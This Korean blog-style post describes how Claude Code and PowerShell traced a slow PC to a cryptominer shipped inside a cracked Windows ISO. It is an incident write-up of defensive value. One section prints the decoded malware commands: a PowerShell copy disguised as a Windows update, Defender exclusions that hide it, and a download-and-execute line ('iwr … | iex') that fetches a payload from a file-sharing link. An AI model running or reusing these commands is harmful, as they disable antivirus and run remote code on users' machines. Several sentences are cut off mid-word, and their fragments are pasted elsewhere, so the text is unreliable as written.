소개
시도하고자 했던 것과 그 이유를 알려주세요.
PC가 몇 주째 버벅였습니다. 은행 보안 프로그램을 깔고 나서부터였어요. 엑셀이 멈추고, 화면이 까맣게 얼어붙고, PDF도 사진도 안 열렸습니다.
원인이 뻔해 보였습니다. 다들 아시는 그 한국 은행 보안 프로그램이요. 실제로 답답해서 다 지워보기도 했습니다.
그런데 클로드 코드에게 "PC 점검 좀 해줄래?"라고 맡겼더니 완전히 다른 결론이 나왔습니다. 은행 프로그램은 무죄였고, 진짜 범인은 윈도우 설치 7분 만에 자리 잡은 코인 채굴 악성코드였습니다.
전문 보안 도구를 쓴 게 아닙니다. 윈도우에 기본으로 들어있는 PowerShell만으로 찾아냈습니다. 그 과정을 그대로 공유합니다.
진행 방법
어떤 도구를 사용했고, 어떻게 활용하셨나요?
Tip: 사용한 프롬프트 전문을 꼭 포함하고, 내용을 짧게 소개해 주세요.
Tip: 활용 이미지나 캡처 화면을 꼭 남겨주세요.
Tip: 코드 전문은 코드블록에 감싸서 작성해주세요. ( / 을 눌러 '코드 블록'을 선택)
사용한 도구는 클로드 코드(Claude Code)와 윈도우 기본 PowerShell입니다. 별도 백신이나 보안 도구는 쓰지 않았습니다. 클로드가 PowerShell 명령을 직접 실행하고 결과를 해석하는 방식으로 진행했습니다.
[제가 입력한 프롬프트 전문] 기술적인 지시는 하나도 없습니다. 증상만 말했습니다.
"은행 보안 프로그램을 깔고나면 계속 렉이 걸리고 블랙스크린 화면 멈춤. 엑셀도 멈춤, pdf도 잘 안열리고 사진도 잘 안열려. 한번 피씨 점검을 우선 해주면 안될까?"
"머가 문제가 있는지 또 렉이 걸리네. 엑셀도 렉이 걸리고 문서 폴더이동도 그렇고"
"팬이 또 돌아"
"재부팅했는데 다시 한번
[1단계] 용의자의 알리바이부터 쟀습니다
저였으면 은행 프로그램부터 지웠을 겁니다. 실제로 지웠었고요. 클로드는 지우기 전에 먼저 쟀습니다. 상주 중인 보안 프로그램 9개가 53분 동안 쓴 CPU 시간 총합입니다.
INISAFECrossWebEXSvc — 4.6초 / 0.1% / 27.7MB
veraport-x64 — 2.3초 / 0.1% / 45.6MB
MagicLine4NX — 1.2초 / 0% / 30.0MB
I3GProc — 0.6초 / 0% / 24.2MB
나머지 5개 — 0.2초 / 0% / 64.7MB
합계 — 8.9초 / 0.3% / 192MB
53분 동안 8.9초. 9개를 전부 합친 값입니다. 그런데 같은 순간 CPU 전체 사용률은 41%였습니다. 은행 프로그램이 0.3%라면 나머지 40%는 어디서 나온 걸까요. 이 질문이 사건의 방
[2단계] 엑셀을 죽인 건 그래픽 드라이버였습니다
이벤트 로그의 엑셀 크래시 2건은 모두 오류 모듈이 AMD 파일이었습니다.
08/19 08:54 EXCEL.EXE 크래시 ← amdxx64.dll
08/18 07:28 EXCEL.EXE 크래시 ← amdihk64.dll
amdihk64.dll은 AMD가 실행되는 모든 프로세스에 주입하는 후킹 DLL입니다. 은행 보안 프로그램도 똑같이 자기 DLL을 끼워넣습니다. 전역 후킹 두 개가 같은 자리에서 부딪히면 앱이 죽습니다.
"은행 프로그램 깔고 나서 시작됐다"는 제 기억은 사실이었습니다. 다만 원인이 아니라 방아쇠였습니다. 드라이버를 최신으로 올리니 엑셀·PDF·사진 문제가 다 사라졌습니다. 여기서 끝난 줄 알았는데, 팬이 다시 돌기 시
[3단계] cmd.exe는 계산을 하지 않습니다
실시간 CPU 측정에서 맨 위에 cmd가 있었습니다.
cmd (PID 17696) — 코어 점유 178.6% / 경로 읽기 불가
EXCEL — 83.9% / explorer — 27.1%
디스크 사용시간 0% / 디스크 큐 0 / 메모리 여유 4.5GB
디스크도 메모리도 한가한데 CPU만 탑니다. 순수 연산 부하의 서명입니다. 정상 cmd.exe는 명령을 넘겨주고 기다리는 껍데기라 CPU가 0에 수렴합니다. 신원을 조회하니 이랬습니다.
실제경로 : 읽기 불가 (권한 부족)
회사 : 비어 있음 → 정상값은 Microsoft Corporation
설명 : 비어 있음 → 정상값은 Windows 명령 처리기
스레드 : 15개 → 정상값은 1~3개
부모 : svchost.exe
같은 사용자 소유인데 조회가 막힌다 = 관리자 권한으로 승격되어 실행 중. 부모가 svchost이고 주기적으로 되살아난
[4단계] 구글 업데이트로 위장한 예약 작업
Microsoft\Windows\Google 경로에 SYSTEM 최고 권한으로 등록된 작업이 있었습니다. 정품 구글 업데이트는 그 경로를 쓰지 않습니다. 인자가 base64로 두 겹 인코딩돼 있어서 디코딩했습니다.
(1) 위장 — powershell.exe를 복사해 윈도우 업데이트 이름을 붙입니다. 정품 서명된 MS 바이너리라 백신이 잡지 않습니다.
cmd.exe /c copy ...\powershell.exe C:\ProgramData\KB5019959.exe
(2) 백신 무력화 — 스스로를 검사 대상에서 제외합니다.
Add-MpPreference -ExclusionPath 'C:\ProgramData\Google' -ExclusionProcess 'svchost.exe','KB5019959.exe','cmd.exe','powershell.exe'
점검 초반 Defender가 "위협 0건"이라고 답한 이유가 이것이었습니다. 무능한 게 아니라 눈이 가려져 있었습니다.
(3) 페이로드 투하 — 구글 드라이브에서 받아 메모리에서 바로 실행하고, png로 위장한 암호 압축을 풀어 채굴기를 꺼냅니다.
iwr '구글드라이브 주소' -UseBasicParsing | iex ; 7z.exe x .png.001 -px -y
디스크에는 그림 파일처럼 보이는 조각만 남습니다. 실제로 C:\Windows\svchost.exe가 있었습니다. 414KB에 파일 설명이 "Windows PowerShell"이었습니다. 진짜 svchost.exe는 System32에만 있고
[5단계] 감염 경로가 확정된 순간
파일 생성 시각을 늘어놓자 사건의 성격이 완전히 달라졌습니다.
2025-09-14 10:31 — SppExtComObjHook.dll 생성 (KMS 정품인증 크랙)
2025-09-14 10:38 — 내장 Administrator 계정 마지막 로그온
2026-07-29 15:34 — 윈도우 11 설치 완료
2026-07-29 15:41 — KB5026372.exe 생성
2026-07-29 15:41 — KB5019959.exe 생성
2026-07-29 15:42 — C:\Windows\svchost.exe 생성
크랙 파일 날짜가 제 윈도우 설치보다 10개월 앞섭니다. 설치 후에 감염된 게 아니라 설치 매체 안에 이미 들어 있었다는 뜻입니다. 같은 날 7분 간격으로 찍힌 Administrator 로그온은 그 이미지를 만든 사람의 작업 흔적입니다.
제가 이상한 파일을 받거나 낚시 메일을 연 게 아니었습니다. 정품인증 툴이 포함된 윈도우 ISO를 설치한 것,
[6단계] 제거 — 순서가 결과를 갈랐습니다
파일부터 지우면 예약 작업이 다시 받아옵니다. 작업부터 지워야 합니다.
1. 예약 작업 제거 (재생성 차단) → 2. 악성 프로세스 종료 → 3. Defender 제외 목록 원복 → 4. 위장 파일 삭제 → 5. 검증
클로드가 이 순서대로 PowerShell 스크립트를 짜서 바탕화면에 만들어줬고, 저는 관리자 터미널에서 실행만 했습니다. 관리자 권한이 필요한 작업은 클로드가 직접 못 합니다. UAC 승인은 사람이 눌러야 하더군요.
3번에서 예상보다 큰 게 드러났습니다. 검사 제외로 등록된 항목이 10개였습니다.
경로 — C:\ProgramData\Google, C:\Users\*\AppData\Local\Temp, C:\Windows\Temp, SppExtComObjHook.dll
프로세스 — svchost.exe, services.exe, dwm.exe, InstallUtil.exe, MSBuild.exe, cmd.exe, powershell.exe, KB5019959.exe, KB5026372.exe 등
임시 폴더 두 곳을 통째로 열어뒀습니다. 어디서든 무엇이든 실행 가능한 상태였던 겁니다. InstallUtil과 MSBuild는 정품 .NET 도구를 악성 코드 실행에 빌려 쓰는 전형적인 수법이라고 합니다.그게 전부였습니다. 크기도 다릅니다.다 = 작업 스케줄러.작했습니다.향을 바꿨습니다. 점검해줘"
결과와 배운 점
배운 점과 나만의 꿀팁을 알려주세요.
과정 중에 어떤 시행착오를 겪었나요?
도움이 필요한 부분이 있나요?
앞으로의 계획이 있다면 들려주세요.
[결과] 제거 전 → 제거 후
채굴 프로세스 CPU : 코어 178~182% → 0%
Defender 검사 제외 : 10건 → 0건
SYSTEM 권한 예약 작업 : 2개 → 0개
위장 시스템 파일 : 4개 → 0개
UAC 확인창 : 꺼짐 → 켜짐
팬 소음 : 상시 → 정지
재부팅해도 되살아나지 않았고, 팬이 멎었습니다. 엑셀 렉, 폴더 이동 지연, 블랙스크린 모두 사라졌습니다.
[배운 점 1] 백신의 "이상 없음"은 증거가 아닙니다
Defender는 끝까지 위협 0건이라고 답했습니다. 악성코드가 자기 경로와 프로세스를 검사 제외에 등록해뒀기 때문입니다. 백신 결과를 믿기 전에 제외 목록부터 봐야 한다는 걸 배웠습니다. 거기에 Temp 폴더나 시스템 프로세스가 올라와 있으면 그 자체가 침해 지표입니다.
[배운 점 2] 가장 그럴듯한 용의자를 먼저 재라
은행 보안 프로그램은 완벽한 알리바이가 있었습니다. 그런데 아무도 재보지 않았다면 지우고 다시 깔고 또 지우면서 몇 주를 썼을 겁니다. 실제로 제가 그러고 있었고요. 의심을 확인이 아니라 측정으로 처리하니 방향이 빨리 잡혔습니다.
[배운 점 3] 공짜 정품인증의 값은 나중에 청구됩니다
인증 크랙과 채굴기가 같은 파일에 담겨 왔습니다. 3주 동안 SYSTEM 권한으로 상주했고, 그 PC로 인터넷뱅킹을 했습 니다. 제거로 되돌릴 수 있는 건 성능뿐이고 그동안 지나간 정보는 되돌릴 수 없습니다. 비밀번호는 다른
[시행착오] 클로드도 한 번에 맞히지 못했습니다
처음엔 클로드도 "은행 프로그램 자동 시작을 끄자"고 제안했습니다. 그런데 실측해보고 스스로 그 제안을 철회했습니다. 0.3%짜리를 건드릴 이유가 없다면서요. 1차 제거 스크립트도 실행 중인 채굴기를 못 잡아서 2차를 만들어야 했습니다.
인상적이었던 건 제가 "은행 프로그램 다 지웠다"고 말했을 때였습니다. 그냥 믿지 않고 다시 스캔해서 "아직 돌아가고 있다"고 알려주더군요. 실제로 서비스가 살아있었습니다. 사람 말보다 시스템 상태를 봤던 겁니다.
스크립트를 한글로 만들었다가 인코딩이 깨져서 문법 오류가 난 적도 있습니다. 영문으로 다시 짜서 해결했습니다.
[내 PC도 확인해보려면 - 5분]
팬이 이유 없이 돌거나, 아무것도 안 하는데 느리다면 이 순서로 보세요.
1. 작업 관리자(Ctrl+Shift+Esc)에서 CPU 순 정렬. cmd, svchost, InstallUtil, MSBuild가 상위에 있으면 비정상입니다.
2. 해당 프로세스 우클릭 → 속성. 회사와 설명이 비어 있으면 위장입니다. 정상 cmd.exe는 Microsoft Corporation으로 나옵니다.
3. 탐색기 주소창에 C:\Windows\svchost.exe 입력. 이 경로에 파일이 있으면 감염입니다. 정상 시스템에는 없습니다.
4. Windows 보안 → 바이러스 및 위협 방지 → 설정 관리 → 제외. 등록한 적 없는 항목이 있으면 침해로 보셔야 합니다. 가장 확실한 지표입니다.
5. taskschd.msc 실행 후 Microsoft\Windows\Google 경로 확인. 정품 구글 업데이트는 이 위치를 쓰지 않습니다.
혹시 PC가 이유 없이 느리신 분들, 한 번 재보세요. 범인이 생각한 그 놈이 아닐 수도 있습니다.기기에서 전부 바꿨습니다.
도움 받은 글 (옵션)
참고한 지피터스 글이나 외부 사례를 알려주세요.
별도로 참고한 글 없이, 증상만 말하고 클로드 코드와 주고받으며 진행한 실제 세션 기록입니다. 사용한 명령과 출력값은 모두 제 PC에서 수집된 것이고, 개인정보에 해당하는 부분(PC 이름, 계정 식별자, 페이로드 배포 주소)은 제외했습니다.
같은 증상 겪으시는 분 계시면 댓글 남겨주세요. 어떤 명령으로 확인했는지 공유드리겠습니다.